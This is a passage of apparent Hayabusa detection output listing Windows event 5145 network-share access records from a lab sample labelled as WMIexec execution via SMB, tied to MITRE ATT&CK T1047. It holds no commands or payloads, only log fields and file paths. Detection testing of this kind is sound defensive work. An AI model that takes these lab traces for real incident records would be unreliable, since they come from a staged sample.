0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | 
LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 